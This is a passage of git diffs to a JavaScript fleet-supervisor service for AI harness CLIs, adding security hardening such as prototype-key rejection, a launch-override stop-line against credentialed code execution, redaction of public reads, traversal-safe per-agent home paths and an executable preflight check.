-            stderrBytes : record.stderrBytes ?? 0
+            state        : record.state,
+            running      : record.state === 'running',
+            pid          : record.pid,
+            startedAt    : record.startedAt,
+            uptimeMs     : record.state === 'running' && record.startedAt ? Date.now() - Date.parse(record.startedAt) : null,
+            exitCode     : record.exitCode,
+            exitedAt     : record.exitedAt,
+            stderrBytes  : record.stderrBytes ?? 0,
+            authRequired : this.authRequiredForHome(record.harnessType, record.instanceHome),
+            binaryVersion: record.binaryVersion ?? null
         };
+    }
+
+    /**
+     * @summary The live per-home auth heuristic: `false` when the family's auth-marker file exists
+     * inside the instance home (the operator-owned per-home login completed), `true` when the home
+     * exists without it, `null` when the family/home is unknown (raw launches). Presence-only —
+     * the marker's content is never read.
+     * @param {String|null} harnessType
+     * @param {String|null} instanceHome
+     * @returns {Boolean|null}
+     */
+    authRequiredForHome(harnessType, instanceHome) {
+        const marker = harnessType && HARNESS_AUTH_MARKERS[harnessType];
+        if (!marker || !instanceHome) return null;
+
+        return !fs.existsSync(path.join(instanceHome, marker));
     }
 
     /**
@@ -421,13 +511,14 @@ class FleetLifecycleService extends Base {
             // root / binary path decide the launch — the registry payload contributes no command.
             const binaryPath = this.getHarnessBinaryPath(agent.harnessType);
             if (!binaryPath) {
-                throw new Error(`FleetLifecycleService: agent '${agent.id}' (harnessType '${agent.harnessType}') has no launch spec and no built-in launch template. Set metadata.launch = {command, args} or use a templated harnessType.`);
+                throw new Error(`FleetLifecycleService: agent '${agent.id}' (harnessType '${agent.harnessType}') has no launch template. Use a templated harnessType, or have the Brain/operator set a launch override via FleetRegistryService.setLaunchOverride.`);
             }
-            return deriveHarnessLaunchSpec({
-                harnessType : agent.harnessType,
-                instanceHome: deriveAgentInstanceHome({instanceRoot: this.getInstanceRoot(), agentId: agent.id, harnessType: agent.harnessType}),
-                binaryPath
-            });
+            const instanceHome = deriveAgentInstanceHome({instanceRoot: this.getInstanceRoot(), agentId: agent.id, harnessType: agent.harnessType});
+            return {
+                ...deriveHarnessLaunchSpec({harnessType: agent.harnessType, instanceHome, binaryPath}),
+                // carried for observability: `status` computes the live per-home authRequired from it
+                instanceHome
+            };
         }
 
         if (!launch.command) {
@@ -439,38 +530,44 @@ class FleetLifecycleService extends Base {
             throw new Error(`FleetLifecycleService: agent '${agent.id}' has an invalid metadata.launch.env — expected a plain Object of string values.`);
         }
         for (const [key, value] of Object.entries(env)) {
+            if (PROTO_ENV_KEYS.includes(key)) {
+                throw new Error(`FleetLifecycleService: agent '${agent.id}' has an invalid metadata.launch.env — prototype-mutating key '${key}' is rejected (JSON-parsed own keys survive into the merge; assigning them would mutate the prototype chain, never define an env var).`);
+            }
             if (typeof value !== 'string') {
                 throw new Error(`FleetLifecycleService: agent '${agent.id}' has an invalid metadata.launch.env — '${key}' must map to a String value.`);
             }
         }
 
-        return {command: launch.command, args: Array.isArray(launch.args) ? launch.args : [], env};
+        return {command: launch.command, args: Array.isArray(launch.args) ? launch.args : [], env, instanceHome: null};
     }
 
     /**
-     * @summary Resolve (field > env > default) the absolute per-agent harness instance-home root.
-     * Mirrors `FleetManager.getManagedRoot`: the `instanceRoot` field, then the
-     * `NEO_FLEET_INSTANCE_ROOT` env, then a `__dirname`-relative
-     * `<repoRoot>/.neo-ai-data/fleet/instances` default — the sibling of the managed checkouts root.
-     * No hidden fallback — an unset field + unset env yields exactly the default.
+     * @summary Resolve the absolute per-agent harness instance-home root: the `instanceRoot` field
+     * when explicitly injected (the test/tenant override seam), else the AiConfig
+     * `fleet.instanceRoot` leaf — the SSOT that owns the default AND its env binding
+     * (`NEO_FLEET_INSTANCE_ROOT`), per the config-is-SSOT contract: this service never re-derives from `process.env`
+     * and holds no hidden default.
      * @returns {String}
      */
     getInstanceRoot() {
-        return this.instanceRoot || process.env.NEO_FLEET_INSTANCE_ROOT || path.resolve(__dirname, '../../../.neo-ai-data/fleet/instances');
+        return this.instanceRoot || AiConfig.fleet.instanceRoot;
     }
 
     /**
-     * @summary Resolve (field > env > default) the harness binary path for one harness family —
-     * the same three-layer shape as {@link getInstanceRoot}, per family: the `harnessBinaryPaths`
-     * field entry, then the family env var (`NEO_FLEET_CODEX_BIN` / `NEO_FLEET_CLAUDE_CODE_BIN`),
-     * then the family default. The codex default is the ChatGPT-app-bundled CLI — an alpha channel
-     * that self-updates with its app, so production fleets pin via the env var or the field. An
-     * untemplated family resolves `null` — {@link resolveLaunch} fails loud rather than guessing.
+     * @summary Resolve the harness binary path for one harness family: the `harnessBinaryPaths`
+     * field entry when explicitly injected (the test/tenant override seam), else the family's
+     * AiConfig `fleet.harnessBinaries.*` leaf — the SSOT owning the default and its env binding
+     * (`NEO_FLEET_CODEX_BIN` / `NEO_FLEET_CLAUDE_CODE_BIN`). The codex leaf default is the
+     * ChatGPT-app-bundled CLI — an alpha channel that self-updates with its app, so production
+     * fleets pin the leaf; `status().binaryVersion` surfaces what actually ran. An untemplated
+     * family resolves `null` — {@link resolveLaunch} fails loud rather than guessing.
      * @param {String} harnessType
      * @returns {String|null}
      */
     getHarnessBinaryPath(harnessType) {
-        return this.harnessBinaryPaths?.[harnessType] || process.env[HARNESS_BINARY_ENV_VARS[harnessType]] || HARNESS_BINARY_DEFAULTS[harnessType] || null;
+        const leafKey = HARNESS_BINARY_LEAF_KEYS[harnessType];
+
+        return this.harnessBinaryPaths?.[harnessType] || (leafKey ? AiConfig.fleet.harnessBinaries[leafKey] : null);
     }
 
     /**

--- a/ai/services/fleet/FleetLifecycleService.mjs
+++ b/ai/services/fleet/FleetLifecycleService.mjs
@@ -197,6 +197,14 @@ class FleetLifecycleService extends Base {
     spawnFn = null
 
     /**
+     * Auxiliary-subprocess implementation for the version probe. Defaults (via
+     * {@link getExecFileFn}) to `child_process.execFile`; inject a recorder in tests to assert the
+     * probe's env boundary without executing a binary.
+     * @member {Function|null} execFileFn=null
+     */
+    execFileFn = null
+
+    /**
      * Supervised processes keyed by agent id. Records carry NO secret.
      * @member {Map<String,Object>} processes
      * @private
@@ -220,7 +228,10 @@ class FleetLifecycleService extends Base {
     start(id, opts = {}) {
         if (this.isRunning(id)) return this.status(id);
 
-        const agent = this.getRegistry().getAgent(id);
+        // The RAW definition read (Brain-internal): the public getAgent projection deliberately
+        // redacts metadata.launch, so the spawn path — the one consumer entitled to the launch
+        // override — reads through the registry's definition surface instead.
+        const agent = this.getRegistry().getDefinition(id);
         if (!agent) throw new Error(`FleetLifecycleService.start: unknown agent '${id}'.`);
 
         const launch                          = this.resolveLaunch(agent),
@@ -284,12 +295,13 @@ class FleetLifecycleService extends Base {
         // pre-load it (guard above).
         env[AGENT_IDENTITY_ENV_VAR] = id;
 
-        // Executable preflight (fail-closed): a path-shaped command must exist BEFORE any secret is
-        // minted or a spawn attempted — a typo'd/missing binary fails loud here, not as a child
-        // 'error' event racing the first status read. Bare commands (e.g. `claude`) resolve via the
-        // child's PATH; the spawn itself asserts their existence.
-        if (command.includes('/') && !fs.existsSync(command)) {
-            throw new Error(`FleetLifecycleService.start: harness binary not found at '${command}' for agent '${id}'. Pin the AiConfig fleet.harnessBinaries leaf or the harnessBinaryPaths field to a real executable.`);
+        // Executable preflight (fail-closed): the command must exist BEFORE any secret is minted or
+        // a spawn attempted — for path-shaped commands via a direct stat, for bare commands (e.g.
+        // `claude`) by resolving against the CHILD's PATH. Without the bare-command half, a missing
+        // binary would let start() publish `running` with a null pid and flip to failed ~100ms
+        // later on the async ENOENT — a transient false-running state no supervisor may emit.
+        if (!this.resolveExecutable(command, env.PATH)) {
+            throw new Error(`FleetLifecycleService.start: harness binary '${command}' not found for agent '${id}' (path-shaped commands must exist; bare commands must resolve on the child's PATH). Pin the AiConfig fleet.harnessBinaries leaf or the harnessBinaryPaths field to a real executable.`);
         }
 
         // The child's working directory: the agent's provisioned repo checkout when the caller supplies
@@ -333,8 +345,11 @@ class FleetLifecycleService extends Base {
         // `<binary> --version` async onto the record — the status read surfaces what actually runs,
         // so an app-bundle alpha channel that self-updated is VISIBLE, not silently different.
         // Failure is non-fatal (version stays null); the probe never blocks the spawn path.
+        // The probe runs under the SAME minimal env as the supervised child: every subprocess this
+        // service creates shares one secret boundary — an auxiliary execFile inheriting the full
+        // parent env would hand ambient provider secrets to the probed binary.
         try {
-            execFile(command, ['--version'], {timeout: 3000}, (error, stdout) => {
+            this.getExecFileFn()(command, ['--version'], {timeout: 3000, env}, (error, stdout) => {
                 if (!error && stdout) record.binaryVersion = String(stdout).trim().split('\n')[0].slice(0, 80);
             });
         } catch (ignored) {}
@@ -584,6 +599,40 @@ class FleetLifecycleService extends Base {
      */
     getSpawnFn() {
         return this.spawnFn || spawn;
+    }
+
+    /**
+     * @returns {Function} the version-probe implementation (injected stub or `child_process.execFile`).
+     * @private
+     */
+    getExecFileFn() {
+        return this.execFileFn || execFile;
+    }
+
+    /**
+     * @summary Synchronous executable resolution for the spawn preflight: path-shaped commands
+     * stat directly; bare commands scan the CHILD's PATH (the allowlisted one — resolution must
+     * match what the spawn will actually see, not the parent's ambient PATH). Returns `null` when
+     * nothing resolves, which the preflight converts into a synchronous, named failure instead of
+     * a published-then-retracted running state.
+     * @param {String} command   The launch command (absolute/relative path or bare binary name).
+     * @param {String} [pathValue] The child env's PATH value.
+     * @returns {String|null} The resolved path, or `null` when the command cannot resolve.
+     * @private
+     */
+    resolveExecutable(command, pathValue) {
+        if (command.includes('/')) {
+            return fs.existsSync(command) ? command : null;
+        }
+
+        for (const dir of String(pathValue || '').split(path.delimiter)) {
+            if (dir) {
+                const candidate = path.join(dir, command);
+                if (fs.existsSync(candidate)) return candidate;
+            }
+        }
+
+        return null;
     }
 }
 

--- a/ai/services/fleet/FleetLifecycleService.mjs
+++ b/ai/services/fleet/FleetLifecycleService.mjs
@@ -272,6 +272,16 @@ class FleetLifecycleService extends Base {
             env[key] = value;
         }
 
+        // Executable preflight (fail-closed, BEFORE any secret is resolved or minted): the command
+        // must resolve to an executable file exactly the way the spawn will resolve it — child cwd
+        // for path-shaped/relative forms, the child's PATH for bare forms, executable permission
+        // required (existence alone lets a mode-0644 candidate publish a running status, then flip
+        // to failed on the child's asynchronous permission error — a transient false-running state
+        // no supervisor may emit).
+        if (!this.resolveExecutable(command, env.PATH, opts.cwd)) {
+            throw new Error(`FleetLifecycleService.start: harness binary '${command}' not found or not executable for agent '${id}' (path-shaped commands resolve against the child cwd; bare commands against the child's PATH; executable permission required). Pin the AiConfig fleet.harnessBinaries leaf or the harnessBinaryPaths field to a real executable.`);
+        }
+
         const pat = this.getRegistry().resolveCredential(id);
         if (pat != null) env[this.credentialEnvVar] = pat;
 
@@ -294,15 +304,6 @@ class FleetLifecycleService extends Base {
         // ambient identity the FM process happens to carry. Reserved class #4: launch.env can never
         // pre-load it (guard above).
         env[AGENT_IDENTITY_ENV_VAR] = id;
-
-        // Executable preflight (fail-closed): the command must exist BEFORE any secret is minted or
-        // a spawn attempted — for path-shaped commands via a direct stat, for bare commands (e.g.
-        // `claude`) by resolving against the CHILD's PATH. Without the bare-command half, a missing
-        // binary would let start() publish `running` with a null pid and flip to failed ~100ms
-        // later on the async ENOENT — a transient false-running state no supervisor may emit.
-        if (!this.resolveExecutable(command, env.PATH)) {
-            throw new Error(`FleetLifecycleService.start: harness binary '${command}' not found for agent '${id}' (path-shaped commands must exist; bare commands must resolve on the child's PATH). Pin the AiConfig fleet.harnessBinaries leaf or the harnessBinaryPaths field to a real executable.`);
-        }
 
         // The child's working directory: the agent's provisioned repo checkout when the caller supplies
         // it (the Fleet Manager turnkey path via startAgentProvisioned). Omitted ⇒ inherit this process's
@@ -610,25 +611,42 @@ class FleetLifecycleService extends Base {
     }
 
     /**
-     * @summary Synchronous executable resolution for the spawn preflight: path-shaped commands
-     * stat directly; bare commands scan the CHILD's PATH (the allowlisted one — resolution must
-     * match what the spawn will actually see, not the parent's ambient PATH). Returns `null` when
-     * nothing resolves, which the preflight converts into a synchronous, named failure instead of
-     * a published-then-retracted running state.
-     * @param {String} command   The launch command (absolute/relative path or bare binary name).
+     * @summary Synchronous, SPAWN-EQUIVALENT executable resolution for the preflight: it mirrors
+     * the exact process-resolution boundary the spawn will hit. Path-shaped commands (absolute OR
+     * relative like `./bin/h`) resolve against the CHILD's cwd — the spawn chdirs before exec, so
+     * a relative command is the child's business, never the Fleet Manager process cwd. Bare
+     * commands scan the CHILD's PATH (the allowlisted one), with relative PATH entries also
+     * cwd-resolved. A candidate must be an EXECUTABLE FILE — mere existence is not executable
+     * discovery: a mode-0644 file would pass an existence check, then die asynchronously on
+     * permission denial AFTER a running status was published. Returns `null` when nothing
+     * resolves, which the preflight converts into a synchronous, named failure.
+     * @param {String} command    The launch command (absolute/relative path or bare binary name).
      * @param {String} [pathValue] The child env's PATH value.
-     * @returns {String|null} The resolved path, or `null` when the command cannot resolve.
+     * @param {String} [cwd]       The child's working directory; defaults to this process's cwd.
+     * @returns {String|null} The resolved executable path, or `null` when the command cannot resolve.
      * @private
      */
-    resolveExecutable(command, pathValue) {
+    resolveExecutable(command, pathValue, cwd) {
+        const base = cwd ?? process.cwd();
+
+        const isExecutableFile = candidate => {
+            try {
+                fs.accessSync(candidate, fs.constants.X_OK);
+                return fs.statSync(candidate).isFile();
+            } catch (ignored) {
+                return false;
+            }
+        };
+
         if (command.includes('/')) {
-            return fs.existsSync(command) ? command : null;
+            const candidate = path.resolve(base, command);
+            return isExecutableFile(candidate) ? candidate : null;
         }
 
         for (const dir of String(pathValue || '').split(path.delimiter)) {
             if (dir) {
-                const candidate = path.join(dir, command);
-                if (fs.existsSync(candidate)) return candidate;
+                const candidate = path.resolve(base, dir, command);
+                if (isExecutableFile(candidate)) return candidate;
             }
         }
 

--- a/ai/services/fleet/FleetRegistryService.mjs
+++ b/ai/services/fleet/FleetRegistryService.mjs
@@ -213,7 +213,9 @@ class FleetRegistryService extends Base {
      * @param {String}      id     Registry agent id.
      * @param {Object|null} launch `{command, args, env}` — validated for shape by the lifecycle
      *                             service at resolve time; `null` removes the override.
-     * @returns {Object|null} The updated public definition, or `null` when the agent doesn't exist.
+     * @returns {Object|null} The updated RAW definition (Brain-facing, launch visible — the public
+     *                        projection redacts launch, so it could not confirm this write), or
+     *                        `null` when the agent doesn't exist.
      */
     setLaunchOverride(id, launch) {
         this.ensureLoaded();
@@ -233,7 +235,7 @@ class FleetRegistryService extends Base {
         this.agents.set(id, def);
         this.writeRegistry();
 
-        return this.toPublic(def);
+        return this.getDefinition(id);
     }
 
     /**
@@ -254,6 +256,25 @@ class FleetRegistryService extends Base {
         this.ensureLoaded();
         const def = this.agents.get(id);
         return def ? this.toPublic(def) : null;
+    }
+
+    /**
+     * @summary Brain-internal raw definition read — the ONLY read surface that carries
+     * `metadata.launch`. Same authority posture as {@link setLaunchOverride}: registry-only method,
+     * no `FleetControlBridge` member, no `FLEET_WIRE_METHODS` entry (the dispatch allowlist spec
+     * pins that); the lifecycle spawn path is its consumer. Returns a deep clone (minus secrets) so
+     * no caller can mutate the registry cache through the result.
+     * @param {String} id
+     * @returns {Object|null}
+     */
+    getDefinition(id) {
+        this.ensureLoaded();
+
+        const def = this.agents.get(id);
+        if (!def) return null;
+
+        const {credential, pat, ...rest} = def;
+        return structuredClone(rest);
     }
 
     /**
@@ -325,13 +346,24 @@ class FleetRegistryService extends Base {
     // ---- internals ----------------------------------------------------------
 
     /**
+     * @summary The public projection: secrets stripped AND the Brain/operator-only launch override
+     * redacted. The result is a DEEP CLONE — a shallow spread would hand every get/list/wire caller
+     * the internal metadata object by shared reference, so mutating a returned definition would
+     * mutate the registry cache, and the launch redaction would be bypassable through the alias.
+     * The spawn path reads the launch through {@link getDefinition} instead.
      * @param {Object} def
-     * @returns {Object} A defensive copy of the definition, guaranteed to carry no secret.
+     * @returns {Object} A deep-cloned definition, guaranteed to carry no secret and no launch override.
      * @private
      */
     toPublic(def) {
         const {credential, pat, ...rest} = def;
-        return {...rest};
+        const pub                        = structuredClone(rest);
+
+        if (pub.metadata && Object.hasOwn(pub.metadata, 'launch')) {
+            delete pub.metadata.launch;
+        }
+
+        return pub;
     }
 
     /**

--- a/ai/services/fleet/FleetRegistryService.mjs
+++ b/ai/services/fleet/FleetRegistryService.mjs
@@ -78,7 +78,7 @@ class FleetRegistryService extends Base {
      * @member {String[]} harnessTypes
      * @protected
      */
-    harnessTypes = ['claude-desktop', 'codex', 'antigravity', 'native-neo']
+    harnessTypes = ['claude-code', 'claude-desktop', 'codex', 'antigravity', 'native-neo']
 
     /**
      * Default lifetime of a minted Bridge session token, in milliseconds (1h). Short-lived by
@@ -124,6 +124,15 @@ class FleetRegistryService extends Base {
             throw new Error(`FleetRegistryService.defineAgent: invalid harnessType '${harnessType}'. Must be one of: ${this.harnessTypes.join(', ')}.`);
         }
 
+        // SECURITY STOP-LINE (mechanical): `metadata.launch` is executed with Brain credentials by
+        // the lifecycle service, and `defineAgent` is a wire-allowlisted verb — accepting a launch
+        // payload here would make remote code execution with credentials a Body-reachable normal
+        // form. Rejected at the storage boundary, never stripped silently: the Brain/operator-only
+        // write path is {@link setLaunchOverride}, which no bridge and no wire allowlist exposes.
+        if (metadata && Object.hasOwn(metadata, 'launch')) {
+            throw new Error("FleetRegistryService.defineAgent: 'metadata.launch' is not definable through this surface — wire callers send curated harnessType intent only. Brain/operator launch overrides go through setLaunchOverride.");
+        }
+
         this.ensureLoaded();
 
         const
@@ -136,10 +145,10 @@ class FleetRegistryService extends Base {
                 harnessType,
                 // provider-login resolves via the AiConfig SSOT leaf when unset (no service-local
                 // default shadow); an explicit arg wins, else a prior value is preserved on update.
-                modelProvider : modelProvider || existing?.modelProvider || aiConfig.modelProvider,
+                modelProvider: modelProvider || existing?.modelProvider || aiConfig.modelProvider,
                 metadata,
-                createdAt     : existing?.createdAt || now,
-                updatedAt     : now
+                createdAt    : existing?.createdAt || now,
+                updatedAt    : now
             };
 
         this.agents.set(agentId, def);
@@ -167,6 +176,13 @@ class FleetRegistryService extends Base {
      * @returns {Object|null} The updated public definition, or `null` when the agent doesn't exist.
      */
     updateAgent(id, {metadata, modelProvider} = {}) {
+        // The same mechanical stop-line as {@link defineAgent}: scoped wire verbs (`setRepo`,
+        // `setAvatar`) patch metadata through here, so the launch key is equally unwritable on the
+        // patch path. Brain/operator launch overrides go through {@link setLaunchOverride}.
+        if (metadata && Object.hasOwn(metadata, 'launch')) {
+            throw new Error("FleetRegistryService.updateAgent: 'metadata.launch' is not patchable through this surface. Brain/operator launch overrides go through setLaunchOverride.");
+        }
+
         this.ensureLoaded();
 
         const existing = this.agents.get(id);
@@ -178,6 +194,41 @@ class FleetRegistryService extends Base {
             modelProvider: modelProvider || existing.modelProvider,
             updatedAt    : new Date().toISOString()
         };
+
+        this.agents.set(id, def);
+        this.writeRegistry();
+
+        return this.toPublic(def);
+    }
+
+    /**
+     * @summary The Brain/operator-only write path for a raw launch override — the compatibility
+     * escape hatch the wire can never reach: this method exists on the registry only (no
+     * `FleetControlBridge` member, no `FLEET_WIRE_METHODS` entry — the dispatch allowlist spec pins
+     * that), so a launch payload can only be authored by Brain-side code or an operator process.
+     * The lifecycle service executes a stored `metadata.launch` with Brain credentials, which is
+     * exactly why {@link defineAgent} / {@link updateAgent} reject it: whatever can author THIS is
+     * trusted with arbitrary-command execution already. `null` clears the override (the agent falls
+     * back to its curated family template).
+     * @param {String}      id     Registry agent id.
+     * @param {Object|null} launch `{command, args, env}` — validated for shape by the lifecycle
+     *                             service at resolve time; `null` removes the override.
+     * @returns {Object|null} The updated public definition, or `null` when the agent doesn't exist.
+     */
+    setLaunchOverride(id, launch) {
+        this.ensureLoaded();
+
+        const existing = this.agents.get(id);
+        if (!existing) return null;
+
+        const metadata = {...existing.metadata};
+        if (launch == null) {
+            delete metadata.launch;
+        } else {
+            metadata.launch = launch;
+        }
+
+        const def = {...existing, metadata, updatedAt: new Date().toISOString()};
 
         this.agents.set(id, def);
         this.writeRegistry();

--- a/ai/services/fleet/deriveAgentInstanceHome.mjs
+++ b/ai/services/fleet/deriveAgentInstanceHome.mjs
@@ -1,0 +1,103 @@
+import crypto from 'crypto';
+import path   from 'path';
+
+/**
+ * @summary Derive the stable, collision-free, traversal-safe instance home for a Fleet Manager
+ * agent's isolated harness config/state directory.
+ *
+ * The pure half of Fleet Manager harness-instance provisioning: given a trusted `instanceRoot` and
+ * an agent + harness family, decide *where* that agent's ISOLATED harness home (`CODEX_HOME` /
+ * `CLAUDE_CONFIG_DIR` — see {@link Neo.ai.services.fleet.deriveHarnessLaunchSpec}) belongs —
+ * deterministic path math only, with no fs / env / config access. Isolating the decision makes the
+ * correctness-and-security-critical rule fully unit-testable.
+ *
+ * Two invariants are load-bearing because a harness home carries per-agent **auth + session state**:
+ * - **Stable:** identical inputs always map to the identical path — an unstable home would silently
+ *   fork an agent's harness auth/state across restarts.
+ * - **Collision-free:** distinct agents (or harness families) never share a home — a collision would
+ *   cross-contaminate two agents' auth/session state. Distinctness holds even when two ids sanitize
+ *   to the same readable form, because each segment carries a deterministic hash of the *raw* value.
+ *   The home is keyed by the Fleet **agent id, NEVER `githubUsername`** — two fleet agents may share
+ *   one GitHub identity yet must never share a harness home.
+ *
+ * And one security invariant, mirroring `deriveAgentRepoPath` (an agent id may be an arbitrary
+ * explicit string, not just a GitHub username): the untrusted values are sanitized and the resolved
+ * path is asserted to stay **contained** under `instanceRoot`, so a value like `../../etc` can never
+ * escape the instance tree.
+ *
+ * `instanceRoot` is a required argument — never defaulted, derived, or read from env / fs here (the
+ * config-is-SSOT contract); the consuming service resolves it from config and passes it in.
+ *
+ * @param {Object} options
+ * @param {String} options.instanceRoot An absolute path to the trusted fleet instance-home root.
+ * @param {String} options.agentId      The Fleet Manager agent id (untrusted; any non-empty string).
+ * @param {String} options.harnessType  The harness family, e.g. `'codex'` (untrusted; non-empty).
+ * @returns {String} `<instanceRoot>/<agentSegment>/<harnessSegment>` — absolute, stable, contained.
+ * @throws {Error} If `instanceRoot` is not a non-empty absolute string, or `agentId` / `harnessType`
+ * is not a non-empty string, or (defense-in-depth) the resolved path escapes `instanceRoot`.
+ */
+export function deriveAgentInstanceHome({instanceRoot, agentId, harnessType} = {}) {
+    assertNonEmptyString(instanceRoot, 'instanceRoot');
+    assertNonEmptyString(agentId,      'agentId');
+    assertNonEmptyString(harnessType,  'harnessType');
+
+    if (!path.isAbsolute(instanceRoot)) {
+        throw new Error(`deriveAgentInstanceHome: 'instanceRoot' must be an absolute path, received '${instanceRoot}'.`);
+    }
+
+    const
+        root   = path.resolve(instanceRoot),
+        target = path.resolve(root, safeSegment(agentId), safeSegment(harnessType)),
+        rel    = path.relative(root, target);
+
+    // Defense-in-depth over safeSegment: the resolved path must stay strictly within the instance
+    // root. A silently-wrong path would bind a harness to the wrong home, so an escape is a loud
+    // failure, not a quietly-returned bad path. `path.relative` is the robust containment idiom
+    // (handles a root of `/` and cross-drive targets that a `startsWith` check would mis-handle).
+    if (rel.startsWith('..') || path.isAbsolute(rel)) {
+        throw new Error(`deriveAgentInstanceHome: derived path escaped the instance root (agentId='${agentId}', harnessType='${harnessType}').`);
+    }
+
+    return target;
+}
+
+/**
+ * Build a filesystem-safe, human-readable, collision-free path segment from an untrusted raw value:
+ * a sanitized + length-bounded readable prefix joined to a deterministic 12-hex-char SHA-256 suffix.
+ * The hash makes the segment stable AND keeps distinct raw values distinct even when sanitization is
+ * lossy (e.g. `a/b` and `a-b` sanitize alike but hash differently). Sanitization collapses unsafe
+ * characters and dot-runs and trims leading/trailing separators, so `.` / `..` can never survive as
+ * a bare traversal segment.
+ *
+ * Duplicated from `deriveAgentRepoPath.mjs` (private there — extracting it would change that
+ * module's public surface); keep the two implementations byte-identical so the two managed trees
+ * segment identically.
+ * @param {String} raw
+ * @returns {String} `<readable>-<sha256(raw)[0..12]>`
+ * @private
+ */
+function safeSegment(raw) {
+    const
+        hash      = crypto.createHash('sha256').update(raw).digest('hex').slice(0, 12),
+        sanitized = raw
+            .replace(/[^a-zA-Z0-9._-]+/g, '-') // collapse runs of unsafe chars (incl. `/` and `\`) to one dash
+            .replace(/\.{2,}/g, '.')           // collapse dot-runs — kills `..`
+            .replace(/^[.\-]+|[.\-]+$/g, '')   // trim leading/trailing dots + dashes — kills a bare `.` / `-`
+            .slice(0, 40),                     // bound the readable prefix
+        readable  = sanitized || 'x';          // fallback when sanitization empties the value
+
+    return `${readable}-${hash}`;
+}
+
+/**
+ * Guard a required string argument.
+ * @param {*}      value
+ * @param {String} name
+ * @throws {Error} If `value` is not a non-empty string.
+ * @private
+ */
+function assertNonEmptyString(value, name) {
+    if (typeof value !== 'string' || value.length === 0) {
+        throw new Error(`deriveAgentInstanceHome: '${name}' must be a non-empty string.`);
+    }
+}

--- a/ai/services/fleet/deriveHarnessLaunchSpec.mjs
+++ b/ai/services/fleet/deriveHarnessLaunchSpec.mjs
@@ -1,0 +1,89 @@
+// Per-family harness-home env contract: the ONE env var each supported harness CLI honors as its
+// config/state home — the isolation mechanism that lets many agents share one machine without
+// sharing auth or session state. These are CROSS-PROCESS CONTRACTS (each CLI reads its exact name),
+// so fixed module data, not configurable fields — an override would set a var the harness never
+// reads, silently collapsing the isolation (fail-OPEN). Empirical grounding per family in the
+// function JSDoc below.
+const HARNESS_HOME_ENV_VARS = {
+    'claude-code': 'CLAUDE_CONFIG_DIR',
+    'codex'      : 'CODEX_HOME'
+};
+
+/**
+ * @summary Derive the per-family harness launch template for a Fleet Manager agent: the
+ * `{command, args, env}` spec that starts one ISOLATED harness instance bound to its own
+ * config/state home.
+ *
+ * The pure half of Fleet Manager harness-launch templating: given a harness family, the agent's
+ * derived instance home (see {@link Neo.ai.services.fleet.deriveAgentInstanceHome}) and the
+ * config-resolved binary path, decide *how* that harness launches — deterministic template math
+ * only, with no fs / spawn / env / config access. `FleetLifecycleService.resolveLaunch` consumes
+ * this as the curated-intent normal form (`harnessType` stays classification; the registry payload
+ * never carries a command), keeping the correctness-and-security-critical mapping fully
+ * unit-testable.
+ *
+ * Per-family isolation contracts (the env var each CLI honors as its home):
+ *
+ * - **`'codex'`** → `{command: binaryPath, args: [], env: {CODEX_HOME: instanceHome}}`.
+ *   Empirically-proven isolation: the codex CLI honors `CODEX_HOME` — `codex doctor` against a
+ *   fresh home reports no-auth while the default `~/.codex` stays untouched, so per-agent homes
+ *   never share auth or session state. Headless / daemon variants (`exec`, `app-server`) are args
+ *   the CALLER may append to the returned (fresh, mutable) `args` array — the template pins the
+ *   binary + home, not the mode. Two caveats: an app-bundled codex binary (e.g. the ChatGPT.app
+ *   `Resources/codex`) is an ALPHA channel that self-updates with its app — callers should
+ *   pin/verify the binary they pass in; and per-home `codex login` is the operator-owned auth step
+ *   (a freshly-derived home starts unauthenticated by design).
+ *
+ * - **`'claude-code'`** → `{command: binaryPath, args: [], env: {CLAUDE_CONFIG_DIR: instanceHome}}`.
+ *   Empirically verified (claude CLI 2.1.156, macOS): pointing `CLAUDE_CONFIG_DIR` at a fresh dir
+ *   yields a logged-out instance ("Not logged in · Please run /login") and the CLI materializes its
+ *   config tree (`.claude.json`, `projects/`, `sessions/`) inside that dir, while the default
+ *   `~/.claude` stays the untouched ambient auth home. Per-home `/login` is the operator-owned
+ *   auth step.
+ *
+ * GUI launches (`open -n -a …`) are **excluded by design**: `open` detaches — the spawned process
+ * is the launcher, not the harness — so the Fleet Manager could never supervise (signal, reap, or
+ * observe) the actual harness. Only directly-spawnable CLI binaries are templated.
+ *
+ * An unknown / absent `harnessType` **throws**, naming the supported set — mirroring the lifecycle
+ * service's "classification, not a launcher" stance: this module maps known families; it never
+ * guesses a brittle command for an unknown one.
+ *
+ * @param {Object} options
+ * @param {String} options.harnessType  The harness family — one of `'codex'`, `'claude-code'`.
+ * @param {String} options.instanceHome The agent's isolated harness home (see
+ *                                      {@link Neo.ai.services.fleet.deriveAgentInstanceHome}).
+ * @param {String} options.binaryPath   The harness binary to spawn (config-resolved by the caller;
+ *                                      never guessed here).
+ * @returns {{command: String, args: String[], env: Object}} a fresh spec per call — `args` / `env`
+ * are caller-mutable without cross-call bleed.
+ * @throws {Error} If any argument is not a non-empty string, or `harnessType` is not a supported
+ * family.
+ */
+export function deriveHarnessLaunchSpec({harnessType, instanceHome, binaryPath} = {}) {
+    assertNonEmptyString(harnessType,  'harnessType');
+    assertNonEmptyString(instanceHome, 'instanceHome');
+    assertNonEmptyString(binaryPath,   'binaryPath');
+
+    const homeEnvVar = HARNESS_HOME_ENV_VARS[harnessType];
+
+    if (!homeEnvVar) {
+        const supported = Object.keys(HARNESS_HOME_ENV_VARS).map(type => `'${type}'`).join(', ');
+        throw new Error(`deriveHarnessLaunchSpec: unsupported harnessType '${harnessType}'. Supported: ${supported}.`);
+    }
+
+    return {command: binaryPath, args: [], env: {[homeEnvVar]: instanceHome}};
+}
+
+/**
+ * Guard a required string argument.
+ * @param {*}      value
+ * @param {String} name
+ * @throws {Error} If `value` is not a non-empty string.
+ * @private
+ */
+function assertNonEmptyString(value, name) {
+    if (typeof value !== 'string' || value.length === 0) {
+        throw new Error(`deriveHarnessLaunchSpec: '${name}' must be a non-empty string.`);
+    }
+}

--- a/ai/services/fleet/deriveHarnessLaunchSpec.mjs
+++ b/ai/services/fleet/deriveHarnessLaunchSpec.mjs
@@ -9,6 +9,20 @@ const HARNESS_HOME_ENV_VARS = {
     'codex'      : 'CODEX_HOME'
 };
 
+// Per-family LONG-LIVED mode args — the half of the launch tuple that keeps the process alive
+// under supervision. Both CLIs exit immediately when launched bare with a non-TTY/EOF'd stdin
+// (probed on the exact binaries), so a supervisable template MUST pin a protocol mode AND the
+// supervisor MUST hold stdin open as a pipe (the lifecycle service's stdio contract):
+// - codex `app-server`: the CLI's own long-lived JSON-RPC-over-stdio protocol mode — probed alive
